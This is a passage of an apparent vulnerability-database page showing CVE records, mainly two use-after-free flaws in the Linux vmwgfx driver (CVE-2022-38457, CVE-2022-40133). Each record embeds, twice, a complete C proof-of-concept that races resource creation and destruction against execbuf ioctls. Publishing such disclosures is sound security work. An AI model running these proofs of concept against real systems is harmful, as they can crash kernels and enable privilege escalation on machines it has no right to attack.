      "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3640",
    "datePublished": "2022-10-21T00:00:00.000Z",
    "dateReserved": "2022-10-21T00:00:00.000Z",
    "dateUpdated": "2024-08-03T01:14:03.216Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-38457 (GCVE-0-2022-38457)

Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2024-09-17 02:11

Title

There is an UAF vulnerability in vmwgfx driver

Summary

A use-after-free(UAF) vulnerability was found in function 'vmw_cmd_res_check' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-416 - Use After Free

Assigner

Anolis

References

1 reference

URL	Tags
https://bugzilla.openanolis.cn/show_bug.cgi?id=2074	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Linux	kernel	Affected: v4.20-rc1 , < 5.13.0-52* (custom)

Date Public

2022-09-06 00:00

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:54:03.666Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-09T14:39:51.000Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an UAF vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-38457",
          "STATE": "PUBLIC",
          "TITLE": "There is an UAF vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.20-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38457",
    "datePublished": "2022-09-09T14:39:51.323Z",
    "dateReserved": "2022-09-07T00:00:00.000Z",
    "dateUpdated": "2024-09-17T02:11:30.468Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-40133 (GCVE-0-2022-40133)

Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2024-09-17 03:49

Title

There is an UAF vulnerability in vmwgfx driver

Summary

A use-after-free(UAF) vulnerability was found in function 'vmw_execbuf_tie_context' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-416 - Use After Free

Assigner

Anolis

References

1 reference

URL	Tags
https://bugzilla.openanolis.cn/show_bug.cgi?id=2075	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Linux	kernel	Affected: v4.20-rc1 , < 5.13.0-52* (custom)

Date Public

2022-09-06 00:00

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T12:14:39.687Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid,int cid){   \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=cid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nsid=create_surface();\n\n\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n\n\n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-09T14:39:51.000Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an UAF vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-40133",
          "STATE": "PUBLIC",
          "TITLE": "There is an UAF vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.20-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid,int cid){   \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=cid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nsid=create_surface();\n\n\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n\n\n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-40133",
    "datePublished": "2022-09-09T14:39:51.501Z",
    "dateReserved": "2022-09-07T00:00:00.000Z",
    "dateUpdated": "2024-09-17T03:49:24.624Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-40982 (GCVE-0-2022-40982)

Vulnerability from cvelistv5 – Published: 2023-08-11 02:37 – Updated: 2025-02-13 16:33

Summary

Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CWE

information disclosure
CWE-1342 - Information exposure through microarchitectural state after transient execution

Assigner

intel

References

14 references

URL	Tags
http://www.intel.com/content/www/us/en/security-c…
https://downfall.page
